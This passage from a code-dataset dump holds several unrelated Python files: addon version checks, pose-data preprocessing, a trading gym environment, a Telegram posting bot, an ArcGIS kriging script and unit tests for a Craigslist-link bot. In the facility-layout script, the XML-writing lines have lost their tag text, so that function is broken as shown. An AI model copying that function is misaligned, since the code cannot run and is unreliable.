saved = %s ###################\" % saved)\n\n\ndef check_addon_current_ver(addonID):\n Addon = xbmcaddon.Addon(addonID)\n ver = Addon.getAddonInfo('version')\n return ver\n\n\ndef addon_update_avail(addonID, repo_addonsfile_url):\n current = check_addon_current_ver(addonID)\n latest = check_addon_latest_ver(addonID, repo_addonsfile_url)\n Log(\"AddonID: {}\".format(addonID), \"Current: {}\".format(current), \"Latest: {}\".format(latest))\n if not latest:\n Log()\n return False\n elif compare_versions(current, latest):\n Log(addonID, \"Update Required\")\n return True\n else:\n Log()\n return False\n\ndef compare_versions(current, latest):\n if LooseVersion(current) < LooseVersion(latest):\n return True\n else:\n return False\n","sub_path":"script.tgtv/lib/tgtvservice/common_stuff.py","file_name":"common_stuff.py","file_ext":"py","file_size_in_byte":3443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"606409444","text":"import numpy as np\nfrom data import data_utils\n\n# 动作列表\nactions = [\"walking\", \"eating\", \"smoking\", \"discussion\", \"directions\",\n \"greeting\", \"phoning\", \"posing\", \"purchases\", \"sitting\",\n \"sittingdown\", \"takingphoto\", \"waiting\", \"walkingdog\",\n \"walkingtogether\"]\n# 主要关节点\nH36M_MAJOR_JOINTS = [0, 1, 2, 3, 4, 6, 7, 8, 9, 11, 12, 13, 14, 16, 17, 18, 19, 24, 25, 26, 27]\n\nH36M_MAJOR = []\nfor i in H36M_MAJOR_JOINTS:\n H36M_MAJOR.append(3*i)\n H36M_MAJOR.append(3 * i + 1)\n H36M_MAJOR.append(3 * i + 2)\n\ndef process(data_dir, actions, out_dir, H36M_MAJOR_JOINTS):\n trainortest = ['train', 'test']\n for action in actions:\n for dir in trainortest:\n data = np.load(\"{}/{}/{}.npy\".format(data_dir, dir, action))\n n, l, d = data.shape\n assert d == 99, \"not 99 dim\"\n data = data[:, :, 3:] # 去掉开头的根节点\n data = data[..., H36M_MAJOR]\n data = data.reshape(n, l, 3, -1)\n data = data.transpose(0, 2, 1, 3)\n print(data.shape)\n np.save(\"{}/{}/{}.npy\".format(out_dir, dir, action), data)\n\ndef load_data(data_dir, action, addonedim = True, onehot = False):\n # 暂时没有实现对action的onehot编码,暂时用不到\n # data_all = []\n for act in action:\n data = np.load('{}/{}.npy'.format(data_dir, act))\n if addonedim:\n data = data[...,np.newaxis]\n print(data.shape)\n # data_all.append(data)\n # data_all = np.array(data_all)\n return data\n\ndef UnNormalizeData(normalizedData, data_mean, data_std, actions, one_hot):\n dimensions_to_ignore = []\n lista = [i +1 for i in H36M_MAJOR_JOINTS]\n for i in range(99):\n if i // 3 in lista:\n continue\n dimensions_to_ignore.append(i)\n\n T = normalizedData.shape[0]\n D = data_mean.shape[0]\n\n origData = np.zeros((T, D), dtype=np.float32)\n dimensions_to_use = []\n for i in range(D):\n if i in dimensions_to_ignore:\n continue\n dimensions_to_use.append(i)\n dimensions_to_use = np.array(dimensions_to_use)\n\n if one_hot:\n origData[:, dimensions_to_use] = normalizedData[:, :-len(actions)]\n else:\n origData[:, dimensions_to_use] = normalizedData\n\n # potentially ineficient, but only done once per experiment\n stdMat = data_std.reshape((1, D))\n stdMat = np.repeat(stdMat, T, axis=0)\n meanMat = data_mean.reshape((1, D))\n meanMat = np.repeat(meanMat, T, axis=0)\n origData = np.multiply(origData, stdMat) + meanMat\n return origData\n\ndef denormalize_and_convert_to_euler( data, data_mean, data_std, actions, one_hot ):\n \"\"\"\n Denormalizes data and converts to Euler angles\n (all losses are computed on Euler angles).\n\n Args\n data: dictionary with human poses.\n data_mean: 
d-long vector with the mean of the training data.\n data_std: d-long vector with the standard deviation of the training data.\n dim_to_ignore: dimensions to ignore because the std is too small or for other reasons.\n actions: list of strings with the actions in the data dictionary.\n one_hot: whether the data comes with one-hot encoding.\n\n Returns\n all_denormed: a list with nbatch entries. Each entry is an n-by-d matrix\n that corresponds to a denormalized sequence in Euler angles\n \"\"\"\n\n all_denormed = []\n\n # expmap -> rotmat -> euler\n for i in np.arange( data.shape[0] ):\n denormed = UnNormalizeData(data[i,:,:], data_mean, data_std, actions, one_hot )\n\n for j in np.arange( denormed.shape[0] ):\n for k in np.arange(3,97,3):\n denormed[j,k:k+3] = data_utils.rotmat2euler( data_utils.expmap2rotmat( denormed[j,k:k+3] ))\n\n all_denormed.append( denormed )\n\n return np.array(all_denormed)\n\n\nif __name__ == \"__main__\":\n data_dir = './h36m/temp'\n out_dir = './h36m/processed'\n\n\n process(data_dir, actions, out_dir, H36M_MAJOR_JOINTS )\n","sub_path":"data/processh36m.py","file_name":"processh36m.py","file_ext":"py","file_size_in_byte":3938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"77467303","text":"import csv\nimport time\nimport gym\nimport os\nfrom gym import spaces\nfrom gym.utils import seeding\nfrom torch import initial_seed\nimport yfinance as yf\nimport datetime\nimport pandas as pd\nimport numpy as np\nimport matplotlib.animation as ani\nimport matplotlib.pyplot as plt\n\nclass DayTradingEnv(gym.Env):\n metadata = {'render.modes': ['human']}\n MAX_FLOAT_VAL = np.inf\n reward_range = (-np.inf, np.inf)\n\n\n def __init__(self, start_balance=100000, interval='1d', start_day='2020-01-01', end_day='2020-08-01', tickers=['AAPL', 'MSFT', 'AMZN']):\n\n # Finances\n self.start_balance = start_balance\n self.balance = start_balance\n self.net_worth = start_balance\n self.tickers = tickers\n self.portfolio = np.zeros((2, len(self.tickers)), dtype=np.float32) # 0: purchase price 1: amount\n self.ledger = {'Date':[],'Stock':[],'Shares':[],'Total':[],'Balance':[],'Net Worth':[]}\n self.last_price = []\n self.holdAction = len(self.tickers) * 20\n self.done = False \n self.isDataDownloaded = False\n\n # Time\n self.start_day = start_day\n self.end_day = end_day\n self.steps = 0\n self.time = start_day\n self.interval = interval # valid intervals: 1m,2m,5m,15m,30m,60m,90m,1h,1d,5d,1wk,1mo,3mo\n self.start_file = None\n self.end_file = None\n\n # Data\n self.total_trades = 0\n self.dtype = np.float64\n self.stockLocation = []\n self.columnNames = []\n\n # Actions and Observations\n self.action_space = spaces.Discrete(len(self.tickers) * 20)\n self.observation_space = spaces.Box(low=-np.inf, high=np.inf, shape=(7, len(self.tickers)))\n\n\n # step function to take current action\n def step(self, action):\n self.steps += 1\n value = self.take_action(action)\n reward = self.get_reward(value)\n observation = self.observe_next_day()\n if self.time == self.end_day or self.done == True:\n self.reset()\n\n return observation, reward, self.done, {}\n\n\n def take_action(self, action): \n stockMovement = []\n share = self.get_stock_to_buy(action)\n percentOfMoneyToSpend = self.getBuyPercent(action)\n\n # buy stock\n if action < len(self.tickers) * 10: # BUY\n # print('BUY {}'.format(self.tickers[share]))\n currentPrice = float(self.last_price[share]) \n sharesMoved = (percentOfMoneyToSpend * self.balance)/currentPrice\n transaction = 
currentPrice * sharesMoved\n self.balance -= transaction\n\n if self.portfolio[1, share] != 0:\n purchasePrice = self.portfolio[0, share]\n newPurchasePrice = currentPrice * sharesMoved + purchasePrice * self.portfolio[1, share]\n self.portfolio[1, share] += sharesMoved\n self.portfolio[0, share] = newPurchasePrice / self.portfolio[1, share]\n\n else:\n self.portfolio[0, share] = currentPrice\n self.portfolio[1, share] += sharesMoved\n stockMovement.append([self.portfolio[1, share], currentPrice, sharesMoved, action])\n #self.to_ledger(self.tickers[share], sharesMoved, 0-transaction)\n\n # sell stock\n elif action >= len(self.tickers) * 10 and action != self.holdAction:\n share -= len(self.tickers)\n # print('SELL {}'.format(self.tickers[share]))\n purchasePrice = self.portfolio[0, share]\n currentPrice = float(self.last_price[share])\n sharesMoved = percentOfMoneyToSpend * self.portfolio[1, share]\n\n if sharesMoved != 0:\n transaction = currentPrice * sharesMoved\n self.balance += transaction\n self.portfolio[1, share] -= sharesMoved\n #self.to_ledger(self.tickers[share], sharesMoved, 0-transaction)\n stockMovement.append([purchasePrice, currentPrice, sharesMoved, action]) \n\n # hold stock\n else:\n stockMovement.append([0, 0, 0, action])\n # print('HOLD')\n\n return stockMovement\n\n\n # reward function\n # heavily needs to be redone\n def get_reward(self, values): \n # rewards for share profit relative to amount moved, not entire value\n reward = 0\n for item in values:\n oldPrice = item[0]\n currentPrice = item[1]\n sharesMoved = item[2]\n action = item[3]\n if not sharesMoved and action != self.holdAction:\n reward -= .999\n elif sharesMoved != 0 and action > len(self.tickers)*10:\n reward += (currentPrice * sharesMoved) / (oldPrice * sharesMoved) -1\n reward = reward/len(values)\n\n # print('OLD PRICE: %s' % oldPrice)\n # print('CUR PRICE: %s' % currentPrice)\n # print('SHARES MOVED: %f' % sharesMoved)\n return reward\n\n\n # observes the next state of the enviornment\n # returns observation of current enviornment\n # ----> flattened since openbaselines check_env() function recommended\n def observe_next_day(self):\n\n # names of yfinance headers in csv file\n desired_rows = ['Open', 'Close', 'High', 'Low', 'Volume']\n \n # creating the observation space to manipulate and return as \"obs\"\n obs = np.zeros((len(desired_rows) + 2, len(self.tickers)), dtype=self.dtype) # +2 shares & price\n for countX, stock_location in enumerate(self.stockLocation):\n\n # reads stock data by day\n # decrements csv data to read the first line as current date\n current_data = pd.read_csv(stock_location, names=self.columnNames, skiprows=self.steps, nrows=1)\n\n # setting self.time to check when to end enviornment as data has run out\n # FIX: try case because I am unsure which column name yfinance will use\n try:\n self.time = current_data['Date'][0]\n except:\n self.done = True\n obs = np.zeros((len(desired_rows) + 2, len(self.tickers)), dtype=self.dtype) # +2 shares & price\n return obs\n\n # assigning values to the observation space \n for countY, headerNameInData in enumerate(desired_rows):\n # uses 0 as value becuse the csv file is decrementing through pd.read_csv above\n obs[countY, countX] = current_data.loc[0, headerNameInData] \n self.last_price.append(current_data.loc[0, headerNameInData])\n\n # assigning proper prices and shares to portfolio\n \n # 6th column as the prices column of \"obs\"\n obs[5, countX] = self.portfolio[0, countX]\n\n # 7th column as the shares column of \"obs\"\n obs[6, 
countX] = self.portfolio[1, countX]\n\n # .flatten() recommended by stable_baselines3\n return obs\n\n\n def reset(self):\n # resetting the time variable \n self.time = self.start_day\n # print('Reset:')\n\n # So you don't have to redownload the data every run\n if not self.isDataDownloaded:\n self.download_stocks()\n\n # resetting all the values to inital values\n self.net_worth = self.start_balance\n self.balance = self.start_balance\n self.steps = 1\n self.done = False\n self.portfolio = np.zeros((2, len(self.tickers)), dtype=np.float64) # 0: purchase price 1: amount\n self.ledger.clear()\n out = self.observe_next_day()\n return out\n\n\n def to_ledger(self, stock, shares_moved, transaction):\n self.ledger['Date'].append(self.time)\n self.ledger['Stock'].append(self.tickers[stock])\n self.ledger['Shares'].append(shares_moved)\n self.ledger['Total'].append(transaction)\n self.ledger['Balance'].append(self.balance)\n self.ledger['Net Worth'].append(self.net_worth)\n\n\n def download_stocks(self):\n # clearing stored old stock locations\n self.stockLocation.clear()\n\n # downloading each selected ticker\n for count, stock in enumerate(self.tickers):\n print(\"Downloading: \" + stock)\n stockData = yf.Ticker(stock)\n\n # creating data/ directory\n if not os.path.exists('./data'):\n os.mkdir('./data')\n\n # naming saving location for stock\n stockFileName = 'data/{}.csv'.format(stock)\n stockData.history(start=self.start_day, end=self.end_day, interval=self.interval).to_csv(stockFileName)\n if not count:\n for i in pd.read_csv(stockFileName).tail(1).Date:\n self.end_day = i\n\n # assigning column names \n self.columnNames.clear()\n downloadedFileHeaders = pd.read_csv(stockFileName, nrows=1)\n for col in downloadedFileHeaders.columns:\n self.columnNames.append(col)\n self.stockLocation.append(stockFileName)\n\n # prevents code from downloading the same data every reset\n self.isDataDownloaded = True\n\n\n # returns percent of money to spend on chosen stock\n def getBuyPercent(self, action):\n # number in 1's place is percent of self.balance to spend on chosen stock\n percentOfMoneySpent = action % 10\n\n # if number is 0, it means to invest 100% of money in stock\n if not percentOfMoneySpent:\n percentOfMoneySpent = 10.0\n buyPercent = percentOfMoneySpent / 10.0\n return buyPercent\n\n\n # returns share to be purchased\n def get_stock_to_buy(self, action):\n # share is determined by the digits after the 1's place \n shareToBuy = action // 10\n return shareToBuy\n\n\n def seed(self, seed=None):\n return\n\n def __enter__(self):\n return self\n\n def __exit__(self):\n self.close()\n return False\n","sub_path":"gym_trading/envs/trading_env.py","file_name":"trading_env.py","file_ext":"py","file_size_in_byte":9934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"453236535","text":"import pygame as pg\nimport constants\nimport random\nimport time\n\n\nclass Facts:\n\n def __init__(self):\n self.data = []\n f = open('tips_and_facts.txt', 'r')\n self.data = f.read().split('.\\n')\n f.close()\n self.font = pg.font.SysFont('Comic Sans MS', 30)\n self.rand = random.randint(0, 17)\n self.t = time.time()\n\n def draw(self, screen):\n back = pg.Surface((800, 30))\n if abs(self.t - time.time()) > 5:\n self.rand = random.randint(0, len(self.data) - 1)\n self.t = time.time()\n text = self.font.render(self.data[self.rand], 1, (0, 0, 0))\n back.fill(constants.GOLD)\n back.blit(text, (0, 0))\n screen.blit(back, (0, 
50))\n\n\n\n\n","sub_path":"pacman/facts.py","file_name":"facts.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"166988778","text":"import sys\n# sys.path.extend(['./copct-master','./dananau-pyhop-195ab6320571'])\nimport math\n\n\ndef toXML(state, xml_file_path, tabletop_xspan, tabletop_yspan, layout_xspan, layout_yspan):\n layout_xcoord = str(((layout_xspan/2)+1)*-1)\n layout_ycoord = str(0)\n #print 'xcoord', layout_xcoord\n #print 'ycoord', layout_ycoord\n with open(xml_file_path,'w') as xml:\n xml.write('\\n')\n xml.write('\\n' %(str(tabletop_xspan),str(tabletop_yspan)))\n xml.write('\\n')\n xml.write('\\n')\n xml.write('\\n'%(str(layout_xspan)))\n xml.write('\\n'%(str(layout_yspan)))\n xml.write('\\n'%(layout_xcoord, layout_ycoord))\n xml.write('\\n')\n \n for obj in state:\n if state[obj][0] == 'block':\n xml.write('\\n'%state[obj][5])\n \n xml.write('\\n')\n\n\ndef buildState(state, names, colors, size):\n layoutX = state['room'][1];\n layoutY = state['room'][2];\n halfX = layoutX+2;\n halfY = layoutY+2;\n #print 'XXXXXX', layoutX\n blockDims = {};\n startX = 1;\n startY = 1;\n z = 0.5;\n k = 1;\n towerHeightCounter=1;\n numRooms = len(names);\n inputIndex = -1;\n \n for i in range(1,numRooms+1):\n inputIndex = inputIndex + 1\n for j in range(1,int(size[inputIndex])+1):\n #print 'name ',names[inputIndex]\n #print 'color ',colors[inputIndex]\n state[names[inputIndex]+str(towerHeightCounter)] = ['block', startX, startY, z*towerHeightCounter, 0, colors[inputIndex]]\n blockDims[k] = [startX, startY, z*towerHeightCounter]\n k = k+1 \n towerHeightCounter = towerHeightCounter + 1;\n if towerHeightCounter>int(size[inputIndex]):\n towerHeightCounter=1;\n break;\n numRooms = numRooms-1;\n k = k + 1;\n startX = startX+1;\n \n #4,3\n if startX >= halfX and startY+1 <= halfY:\n startX = 1;\n startY = startY +1;\n if startY == halfY:\n k = k+1;\n break;\n elif startX+1 > halfX and startY+1 > halfY:\n k = k+1;\n break;\n \n startX = 1;\n startY = -1;\n halfY = halfY * -1;\n towerHeightCounter = 1;\n #print 'numRooms between loops: ', numRooms\n \n for i in range(1,numRooms+1):\n inputIndex = inputIndex + 1\n # tower height for this room comes from its size entry, as in the first loop\n for j in range(1,int(size[inputIndex])+1):\n state[names[inputIndex]+str(towerHeightCounter)] = ['block', startX, startY, z*towerHeightCounter, 0, colors[inputIndex]]\n blockDims[k] = [startX, startY, z*towerHeightCounter]\n k = k+1\n \n towerHeightCounter = towerHeightCounter + 1;\n if towerHeightCounter>int(size[inputIndex]):\n towerHeightCounter=1;\n break;\n numRooms = numRooms-1;\n k = k + 1;\n startX = startX+1;\n if startX+1 > halfX and startY-1 > halfY:\n startX = 1;\n startY = startY-1;\n if startY+1 == halfY:\n k = k+1;\n \n \n elif startX+1 > halfX and startY-1 < halfY:\n k = k+1;\n \n \n return state;\n\nif __name__ == '__main__':\n \n # Infer intentions from demo\n #demo = load_demo(demo_directory='./SMILE-1.1.0/room_demo/')\n \n if len(sys.argv) > 1:\n for arg in sys.argv:\n setupStr = arg;\n \n roomBuilder = {}\n rooms = setupStr.split(':')\n k = 0\n destFilename = rooms[-1]\n state = {}\n roomNamesArr = []\n roomColorsArr = []\n roomSizeArr = []\n mainRoomArr = rooms[0].split(\",\") # [room, xspan, yspan]\n state['room'] = [mainRoomArr[0], float(mainRoomArr[1]), float(mainRoomArr[2])]\n i = 1;\n while i < len(rooms)-1:\n roomBuilder[k] = rooms[i].split(',') # 0: [paintRoom,4000,blue]\n roomNamesArr.append(roomBuilder[k][0])\n roomColorsArr.append(roomBuilder[k][1])\n roomSizeArr.append(roomBuilder[k][2])\n i=i+1\n k = k+1\n\n finalState = {}\n finalState = buildState(state, roomNamesArr, roomColorsArr, roomSizeArr)\n #for key in state:\n #print key, state[key]\n\n layoutX = state['room'][1];\n layoutY = state['room'][2];\n tabletopX = (layoutX+2) *2;\n tabletopY = (layoutY+2);\n \n # export to xml for smile viewing\n toXML(state,destFilename, tabletopX, tabletopY, layoutX, layoutY)\n\n\n","sub_path":"Facility Layout Scripts/generateMultiple.py","file_name":"generateMultiple.py","file_ext":"py","file_size_in_byte":4985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"551209949","text":"import sys, os\nfrom setuptools import setup, find_packages\nfrom setuptools.extension import Extension\nfrom Cython.Build import cythonize\nimport numpy as np\n\ndef scandir(dir, files=None):\n # avoid the mutable-default-argument pitfall\n if files is None:\n files = []\n for file in os.listdir(dir):\n path = os.path.join(dir, file)\n if os.path.isfile(path) and path.endswith(\".pyx\"):\n files.append(path.replace(os.path.sep, \".\")[:-4])\n elif os.path.isdir(path):\n scandir(path, files)\n return files\n\n# generate an Extension object from its dotted name\ndef makeExtension(extName):\n extPath = extName.replace(\".\", os.path.sep)+\".pyx\"\n print('path:', extName, extPath)\n return Extension(\n extName,\n [extPath],\n include_dirs = [\".\", np.get_include()], # adding the '.' to include_dirs is CRUCIAL!!\n extra_compile_args = [\"-Wall\"],\n extra_link_args = ['-g', '-Wno-cpp', '-ffast-math', '-O2'],\n define_macros = [('NPY_NO_DEPRECATED_API', 'NPY_1_7_API_VERSION')],\n )\n\n# get the list of extensions\nextNames = scandir(\"numflow\")\n\n# and build up the set of Extension objects\nextensions = [makeExtension(name) for name in extNames]\n\nsetup(\n name = 'numflow', # How you named your package folder (MyLib)\n packages = ['numflow', 'numflow.cython'], # Choose the same as \"name\"\n version = '0.0.5', # Start with a small number and increase it with every change you make\n license='MIT', # Choose a license from here: https://help.github.com/articles/licensing-a-repository\n description = 'Yet another visualization package', # Give a short description about your library\n author = 'Vojtech Tomas', # Type in your name\n author_email = 'tomas@vojtatom.cz', # Type in your E-Mail\n url = 'https://github.com/vojtatom/numflow', # Provide either the link to your github or to your website\n download_url = 'https://github.com/vojtatom/numflow/archive/0.0.5.tar.gz', # I explain this later on\n keywords = ['visualization', 'data', 'flow'], # Keywords that define your package best\n install_requires=[ # dependencies\n 'Cython >= 0.18'\n ],\n classifiers=[\n 'Development Status :: 3 - Alpha', # Choose either \"3 - Alpha\", \"4 - Beta\" or \"5 - Production/Stable\" as the current state of your package\n 'Intended Audience :: Developers', # Define that your audience are developers\n 'Topic :: Scientific/Engineering :: Visualization',\n 'License :: OSI Approved :: MIT License', # Again, pick a license\n 'Programming Language :: Python :: 3', #Specify which python versions you want to support\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n ],\n #packages = [\"visual.modules.numeric\", \"visual.modules.numeric.data\", \"visual.modules.numeric.math\"],\n ext_modules = cythonize(extensions),\n 
include_package_data=True\n)","sub_path":"pypi_install_script/numflow-0.0.5.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"222903637","text":"import os\nimport time\nimport requests\nimport telebot\n\nfrom generation_image.main import Post\nfrom telegram_bot.settings import *\nfrom utils_base import get_no_push_posts, set_post_true\n\nbot = telebot.TeleBot(TOKEN)\n\n\ndef push_post() -> None:\n for post in get_no_push_posts('teleg_flag'):\n message = f'{post[1]}\\n\\n{post[2]}\\n\\nOriginal article: {post[6]}'\n files = []\n paths = []\n set_post_true(post[0], key='teleg_flag')\n if post[6]:\n urls = post[5].split('\\n')\n if len(urls) == 1 and len(message) <= 600:\n img_post = Post(int(post[0]))\n img_post.save()\n with open(img_post.path, 'rb') as f:\n bot.send_media_group('@auto_it_news', [telebot.types.InputMediaPhoto(\n f, caption=f'{post[6]}', parse_mode='markdown'\n )])\n os.remove(img_post.path)\n # move on to the next pending post instead of aborting the whole run\n continue\n else:\n for url in urls:\n url = url.rstrip()\n path = url.split('/')[-1].split('.')\n path = '../' + '_'.join(path[:-1]) + f'.{path[-1]}'\n paths.append(path)\n if url.split('.')[-1] in IMAGE_EXTENSION:\n with open(path, 'wb') as file:\n file.write(requests.get(url).content)\n files.append(open(path, 'rb'))\n try:\n bot.send_media_group(\n '@auto_it_news',\n [telebot.types.InputMediaPhoto(files[0], f'{message}', parse_mode='markdown')] +\n [telebot.types.InputMediaPhoto(f) for f in files[1:]]\n )\n except Exception as e:\n print(e)\n for file in files:\n file.close()\n for path in paths:\n os.remove(path)\n time.sleep(20)\n\n\ndef check() -> None:\n while True:\n try:\n push_post()\n except Exception as e:\n print(e)\n time.sleep(TIME_UPDATE_MINUTES * 60)\n\n\nif __name__ == '__main__':\n check()\n","sub_path":"telegram_bot/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"366198616","text":"# coding=utf-8\nfrom urllib import urlretrieve\nimport threading\nimport time,glob,xlrd\nimport os\nimport pandas as pd\nimport csv\nfrom selenium import webdriver\nimport traceback\nimport numpy as np \nimport arcpy\nimport os.path\nfrom arcpy import env\nfrom arcpy.sa import *\n\n# 2019-08-12 11:35\n# Changshu air quality forecast system\n# 20190808\n\n# Check out the ArcGIS Geostatistical Analyst extension license\narcpy.CheckOutExtension(\"GeoStats\")\n# Check out the ArcGIS Spatial Analyst extension license\narcpy.CheckOutExtension(\"Spatial\")\n# Obtain a license for the ArcGIS 3D Analyst extension\narcpy.CheckOutExtension(\"3D\")\n\ndef EBK_ga(inPointFeatures,outPath):\n try:\n arcpy.AddField_management(inPointFeatures, \"PM102\", \"FLOAT\", 9)\n except :\n traceback.print_exc()\n try:\n arcpy.CalculateField_management (inPointFeatures, 'PM102', \"float(!PM10__μg_!)\", \"PYTHON_9.3\")\n except :\n traceback.print_exc()\n \n name=os.path.split(inPointFeatures)[1][:-4]\n outRaster=os.path.join(outPath,name+'.tif')\n cellSize = 0.01\n transformation = \"NONE\"\n maxLocalPoints = 50\n overlapFactor = 0.5\n numberSemivariograms = 100\n # Set variables for search neighborhood\n radius = 1.0\n smooth = 0.14\n try:\n #lyr to shp\n searchNeighbourhood = arcpy.SearchNeighborhoodSmoothCircular(radius, smooth)\n except Exception as err:\n arcpy.AddMessage(\"SearchNeighborhoodSmoothCircular: \"+\" Failed\")\n arcpy.AddMessage(err.message)\n outputType = \"PREDICTION\"\n Output_geostatistical_layer=''\n quantileValue = \"\"\n thresholdType = \"\"\n probabilityThreshold = \"\"\n semivariogram = \"POWER\"\n tempEnvironment0 = arcpy.env.extent\n arcpy.env.extent = Extent\n # Execute EmpiricalBayesianKriging\n start = time.time()\n try:\n arcpy.EmpiricalBayesianKriging_ga(inPointFeatures, 'PM102', Output_geostatistical_layer ,outRaster,\n cellSize, transformation, maxLocalPoints, overlapFactor,\n numberSemivariograms,\n searchNeighbourhood, outputType, quantileValue, thresholdType,\n probabilityThreshold)\n print ('Converting {} to {}'.format(inPointFeatures, outRaster))\n arcpy.AddMessage(time.strftime('%Y-%m-%d %H:%M:%S')+\":\"+\"Empirical Bayesian kriging interpolation finished\") \n except Exception as err:\n arcpy.AddMessage(\"EmpiricalBayesianKriging_ga: \"+\" Failed\")\n arcpy.AddMessage(err.message)\n end = time.time()\n print('Running time: %s Seconds'%(end-start))\n arcpy.env.extent = tempEnvironment0 \n\ndef getHourPath(date,hour):\n ho=str(hour) if (hour>9) else '0'+str(hour)\n print('11'+date+ho)\n return '11'+date+ho\n\nif __name__ == '__main__':\n path=u'F:\\\\常熟溯源\\\\矢量数据21'\n pathDir = os.listdir(path)\n for PointFeatures in pathDir:\n if PointFeatures[-4:].lower() == '.shp':\n inPointFeatures=os.path.join(path,PointFeatures)\n try:\n print('-------------- '+inPointFeatures+' -----------------------')\n EBK_ga(inPointFeatures,u'F:\\\\插值结果\\\\矢量数据21')\n except:\n traceback.print_exc()\n ","sub_path":"res.py","file_name":"res.py","file_ext":"py","file_size_in_byte":3266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"349163494","text":"import unittest\nimport logging\nfrom copy import deepcopy\nfrom unittest.mock import Mock\n\nfrom archivebot import bot, custommodels\n\n\n# disable application logging during tests\nlogging.disable(logging.CRITICAL)\n\n\nclass TestExtraction(unittest.TestCase):\n\t\"\"\"\n\tThere will usually only be one craigslist url, but because there can be\n\tmore than one, `scrape_url` always returns a list.\n\t\"\"\"\n\tdef setUp(self):\n\t\tself.body = '''\n\t\tMy fiancé and I are desperately trying to find an apartment. Of course we found one of [Craigslist](%url%) for an amazing price. We assumed it was priced the way it was because it was furnished. They said they would mail the keys to us, after we make a payment. I said to them no, that we would like to view the apartment, and if anything would be mailed to us, it should be the lease agreement. That we could wait for the keys, and don’t want to send money just to view a space.\n\t\tMy dilemma is I have given them my name, date of birth and address. I even sent a picture of my fiancé and myself because they sent a photo of their “family”.\n\t\tIn fact another “landlord” said he was also overseas and the situations were similar, so I thought “Oh, people must do this all the time. We are in an age of internet and communications. You don’t need to meet in person anymore!”\n\t\tI didn’t think anything of it, until they responded to my message insisting that we trust one another.\n\t\tAfter that I told them I would have to decline their offer.\n\t\tThe other situation, someone actually called me explaining the details of the property, and what I could expect. They also said they would call to speak to me further. It was the landlords realtor representative. 
However again, they expect me to send money.\n\t\tCan they do anything with my information?\n\t\tI’ve already received notifications in my e-mail that someone tried to sign in my paypal.\n\t\tI provided first and last name, Date of birth Phone number Address\n\t\tMy paypal is not updated with my current phone number. Which is why I think they couldn’t get in.\n\t\t%url2%'''\n\n\tdef test_ExtractUrls_GivenFullUrl_ReturnsUrl(self):\n\t\turl = 'https://indianapolis.craigslist.org/bar/d/bears/6451661128.html'\n\t\ttext = self.body.replace('%url%', url)\n\t\tself.assertEqual(len(bot.extract_urls(text)), 1)\n\n\tdef test_ExtractUrls_GivenFullUrlWithOnlyHTTP_ReturnsUrl(self):\n\t\turl = 'http://indianapolis.craigslist.org/bar/d/bears/6451661128.html'\n\t\ttext = self.body.replace('%url%', url)\n\t\tself.assertEqual(len(bot.extract_urls(text)), 1)\n\n\tdef test_ExtractUrls_GivenMultipleUrls_ReturnsMultipleUrls(self):\n\t\turl = 'http://indianapolis.craigslist.org/bar/d/bears/6451661128.html'\n\t\turl2 = 'https://dallas.craigslist.org/ftw/zip/d/20000-pounds-free-remotes/6426178725.html'\n\t\ttext = self.body.replace('%url%', url)\n\t\ttext = text.replace('%url2%', url2)\n\t\tself.assertEqual(len(bot.extract_urls(text)), 2)\n\n\tdef test_ExtractUrls_GivenForumUrl_ReturnsEmptyList(self):\n\t\turl = 'https://forums.craigslist.org/?forumID=3'\n\t\ttext = self.body.replace('%url%', url)\n\t\tself.assertEqual(len(bot.extract_urls(text)), 0)\n\n\tdef test_ExtractUrls_GivenCraigslistScamsPage_ReturnsEmptyList(self):\n\t\turl = 'https://www.craigslist.org/about/scams'\n\t\ttext = self.body.replace('%url%', url)\n\t\tself.assertEqual(len(bot.extract_urls(text)), 0)\n\n\tdef test_ExtractUrls_GivenCraigslistScamsPageWithRegularHTTP_ReturnsEmptyList(self):\n\t\turl = 'http://www.craigslist.org/about/scams'\n\t\ttext = self.body.replace('%url%', url)\n\t\tself.assertEqual(len(bot.extract_urls(text)), 0)\n\n\tdef test_ExtractUrls_GivenCraigslistSearchPage_ReturnsEmptyList(self):\n\t\turl = 'https://tampa.craigslist.org/d/for-sale/search/sss'\n\t\ttext = self.body.replace('%url%', url)\n\t\tself.assertEqual(len(bot.extract_urls(text)), 0)\n\n\tdef test_ExtractUrls_GivenCraigslistTermsPage_ReturnsEmptyList(self):\n\t\turl = 'https://www.craigslist.org/about/terms.of.use'\n\t\ttext = self.body.replace('%url%', url)\n\t\tself.assertEqual(len(bot.extract_urls(text)), 0)\n\n\tdef test_ExtractUrls_GivenNonCraigslistPage_ReturnsEmptyList(self):\n\t\turl = 'https://www.google.com'\n\t\ttext = self.body.replace('%url%', url)\n\t\tself.assertEqual(len(bot.extract_urls(text)), 0)\n\n\tdef test_ExtractUrls_GivenNonCraigslistPageEndingWithHtml_ReturnsEmptyList(self):\n\t\turl = 'https://www.google.com/about.html'\n\t\ttext = self.body.replace('%url%', url)\n\t\tself.assertEqual(len(bot.extract_urls(text)), 0)\n\n\nclass TestBot(unittest.TestCase):\n\tdef setUp(self):\n\t\tself.mock_submission = Mock(selftext='abc', comment_sort='', url='')\n\t\tself.mock_comment = Mock(body='xyz')\n\t\tself.mock_submission.reply = Mock(return_value=None)\n\t\tself.mock_comment.reply = Mock(return_value=None)\n\n\tdef test_RedditPost_GivenSubmission_PullsTextFromSelftext(self):\n\t\tpost = bot.RedditPost(self.mock_submission)\n\t\tself.assertEqual(post.text, self.mock_submission.selftext)\n\n\tdef 